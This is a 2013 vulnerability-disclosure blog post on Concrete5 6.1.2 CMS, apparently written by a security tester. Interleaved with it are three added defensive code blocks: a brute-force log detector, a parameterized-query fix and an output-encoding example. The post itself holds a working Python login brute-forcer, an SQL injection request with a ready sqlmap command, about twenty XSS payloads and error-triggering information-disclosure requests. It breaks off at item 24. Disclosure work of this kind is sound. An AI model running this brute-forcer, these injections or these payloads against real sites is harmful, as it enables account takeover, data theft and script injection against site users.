Monday 12 August 2013

[EN] Concrete5 6.1.2 Multiple Bugs

From SQL injection via multiple XSS to information gathering...
Enjoy:


Starting with the bugs that are reachable by a logged-in admin user, I should mention
that there is no anti-bruteforce mechanism, so if the admin's password is 'simple',
we can crack it, as described below:

Searching admin's password in Concrete5 CMS

Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py

#!/usr/bin/env python3
# code after a little update : 14.08 ;)
#
import requests
import sys

username = 'admin'
path = '/index.php/login/do_login/'

print('\n_________________________________________________')
print('>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n')
print('If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n')

# usage: concrete5612bf.py http://host/path-to-concrete5
url = sys.argv[1] + path

with open('passwords.txt', 'r') as pwdfile:
    read_pass = pwdfile.readlines()

for test_pass in read_pass:
    # readlines() keeps the trailing newline; strip it so the password is sent as written
    test_pass = test_pass.rstrip('\r\n')

    data = {
        'uName': username,
        'uPassword': test_pass,
        'rcID': '',
        'submit': 'Sign+In+%3E',
    }

    # the first request only obtains a session cookie, the second one carries the credentials
    get_cookies = requests.post(url)
    conn = requests.post(url, data=data, cookies=get_cookies.cookies)

    print('[ > ] Status code for this request: ', conn.status_code)

    # success is detected from the page text ("Currently logged in ..."), not the status code
    lines = conn.text

    if 'Currently' in lines:
        print('[+] Logged in as: [', username, '] with password: [', test_pass, ']')
        break
---< code >---
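What the missing anti-bruteforce mechanism looks like from the server side, as an added example that is not part of the original post: a detector that reads Apache combined-format access log lines and flags source IPs that send many POSTs to the `/index.php/login/do_login/` handler (the path the script above uses) within a short window. The log lines, the threshold and the window are constructed here for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/index.php/login/do_login/"  # login handler used by the post's script
THRESHOLD = 10                             # POSTs from one IP ...
WINDOW = timedelta(minutes=5)              # ... within this sliding window

# Apache "combined" log format (assumed here)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def login_post_times(lines):
    """Timestamps of POSTs to the login handler, grouped by source IP.

    Only the request count matters: the post's script tells success from
    failure by the page text, not the status code, so we do not filter on it.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        # match under any install prefix (the post's site lives under /concrete5/concrete5.6.1.2/)
        if method == "POST" and path.split("?", 1)[0].endswith(LOGIN_PATH):
            by_ip[ip].append(ts)
    return by_ip


def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: peak_count} for IPs with >= threshold login POSTs inside any window."""
    alerts = {}
    for ip, times in login_post_times(lines).items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


# --- constructed sample log: one guessing client and one normal user -------------
_SITE = "/concrete5/concrete5.6.1.2"


def _log_line(ip, ts, method, path, status):
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return '%s - - [%s] "%s %s HTTP/1.1" %d 512 "-" "python-requests/2.0"' % (
        ip, stamp, method, path, status)


_T0 = datetime(2013, 8, 12, 6, 25, 12, tzinfo=timezone.utc)
SAMPLE_LOG = (
    # 12 guesses three seconds apart (the post's script sends two POSTs per guess,
    # so a real trace would be denser still)
    [_log_line("10.0.0.5", _T0 + timedelta(seconds=3 * i), "POST", _SITE + LOGIN_PATH, 200)
     for i in range(12)]
    # a user who mistypes once, twenty minutes before logging in
    + [_log_line("10.0.0.9", _T0 + timedelta(minutes=20 * i), "POST", _SITE + LOGIN_PATH, 200)
       for i in range(2)]
    + [_log_line("10.0.0.9", _T0 + timedelta(minutes=21), "GET", _SITE + "/", 200)]
)

if __name__ == "__main__":
    for ip, count in find_bruteforce(SAMPLE_LOG).items():
        print("possible password guessing from %s: %d login POSTs within %s" % (ip, count, WINDOW))
```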

So once we have the admin password, we can start with...

1. SQL injection
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223

-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"

8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"

11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"

14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"

AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"

'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"

8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"

<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"


-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"

Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"

170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"

0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"

1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
 

Because the "_bf[BLOCK_...]" parameters are not properly filtered, we can use them to generate an SQL error, like this:


---< response >---

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">&lt; Back to Home</a></p>
</div>

---< response >---


To reproduce this vulnerability you can use the sqlmap tool:

root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"

Example of SQL Injection
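The error message shows the cause: the raw `fID` value is spliced into the text of `UPDATE btContentImage SET fID='...'`. As an added example (not code from the post or from Concrete5), the same pattern is reproduced against an in-memory SQLite table shaped like the columns named in the error, next to a fixed version that validates `fID` as an integer and binds it as a query parameter; the table layout and the use of SQLite in place of MySQL are assumptions.

```python
import sqlite3

# The fID value from the post's request, exactly as the server saw it:
# multipart bodies are not URL-decoded, so the leading quote is literal.
PAYLOAD = '\'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e'


def make_db():
    """In-memory stand-in for btContentImage, with the columns named in the error."""
    db = sqlite3.connect(":memory:")
    db.execute("""CREATE TABLE btContentImage (
        bID INTEGER PRIMARY KEY, fID INTEGER, fOnstateID INTEGER,
        maxWidth INTEGER, maxHeight INTEGER, externalLink TEXT,
        internalLinkCID INTEGER, forceImageToMatchDimensions INTEGER, altText TEXT)""")
    db.execute("INSERT INTO btContentImage (bID, fID) VALUES (57, 4)")  # block 57 from the post
    return db


def save_vulnerable(db, bID, fID):
    """The pattern behind the error message: the value is formatted into SQL text."""
    sql = ("UPDATE btContentImage SET fID='%s',fOnstateID=0,maxWidth=0,maxHeight=0,"
           "externalLink='',internalLinkCID=0 WHERE bID=%d" % (fID, bID))
    db.execute(sql)


def save_fixed(db, bID, fID):
    """Validate the type, then bind the value instead of formatting it into the query."""
    try:
        fid_int = int(fID)          # fID refers to a file record: an integer or nothing
    except (TypeError, ValueError):
        raise ValueError("fID must be an integer file ID")
    if fid_int < 0:
        raise ValueError("fID must not be negative")
    db.execute("UPDATE btContentImage SET fID=?,fOnstateID=0,maxWidth=0,maxHeight=0,"
               "externalLink='',internalLinkCID=0 WHERE bID=?", (fid_int, int(bID)))


def current_fid(db, bID):
    return db.execute("SELECT fID FROM btContentImage WHERE bID=?", (bID,)).fetchone()[0]


def demo():
    """Run the post's payload through both versions and report what happened."""
    db = make_db()
    outcome = {}
    try:
        save_vulnerable(db, 57, PAYLOAD)
        outcome["vulnerable"] = "query ran"
    except sqlite3.Error:
        # SQLite's equivalent of the MySQL 1064 syntax error shown in the post
        outcome["vulnerable"] = "syntax error"
    try:
        save_fixed(db, 57, PAYLOAD)
        outcome["fixed"] = "accepted"
    except ValueError:
        outcome["fixed"] = "rejected"
    save_fixed(db, 57, "8")         # a legitimate file ID still saves
    outcome["fid_after"] = current_fid(db, 57)
    return outcome


if __name__ == "__main__":
    print(demo())
```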



2. DOM-based XSS
---< request >---

POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119

-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain

sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"

');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"

1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"


-----------------------------55721791519552--
---< request >---


---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---

3. sql error to check

---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


resp:

<h1>An unexpected error occurred.</h1>

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle  from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID)  inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID)  where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">&lt; Back to Home</a></p>
</div>




4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:


Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>

</div>
<div class="ccm-pane-footer">

9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html


Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134


11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94

MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---

16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187

ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---

resp:
       
    <div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
            mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
        </div>
       

       
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314

akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---

18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971

input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


resp:


<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />                       
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
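Items 2 and 18 reflect input into two different contexts: a JavaScript string literal inside an inline `<script>` (item 2), and HTML attributes plus an inline `style` (item 18). As an added example (not code from the post or from Concrete5), the renderer below shows the encoding each context needs, using the payloads from those two requests; the function names and the attribute layout are assumptions.

```python
import html
import json
import re

# Payloads copied from the post's requests (items 2 and 18)
JS_PAYLOAD = "');</script><script>alert(2);</script>//"
ATTR_PAYLOAD = '\'>"><img/src="x"/onerror="alert(4321)">'


def js_string_literal(value):
    """Encode value as a JavaScript string literal that is safe inside <script>.

    json.dumps handles quotes, backslashes and control characters, but the
    HTML parser still ends the script element at '</script>' (and treats
    '<!--' specially), so angle brackets and '&' are JS-escaped as well.
    The literal still decodes to the original string in the browser.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def js_roundtrip_ok(value):
    """The encoding is lossless: decoding the literal gives the input back."""
    return json.loads(js_string_literal(value)) == value


def render_upload_callback(search_instance):
    """Item 2: searchInstance is echoed into the upload dialog's inline script."""
    return ("<script>window.parent.ccm_filesUploadedDialog(%s);</script>"
            % js_string_literal(search_instance))


def attr(value):
    """Encode for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)


HEX_COLOR = re.compile(r"^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$")


def css_color(value, default="#000"):
    """Inline style is not an escaping context: accept only a hex colour."""
    return value if HEX_COLOR.match(value) else default


def render_theme_color(name, value):
    """Item 18: the value lands in a hidden input, a custom attribute and a style."""
    color = css_color(value)
    return ('<input type="hidden" name="%s" id="%s" value="%s" />'
            '<div class="ccm-theme-style-color" id="theme_%s">'
            '<div hex-color="%s" style="background-color: %s"></div></div>'
            % (attr(name), attr(name), attr(color), attr(name), attr(color), color))
```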
                       
                       
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID=60&blockTypesIncluded%5B1%5D=A
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html


Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206


23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html


Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24

24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033

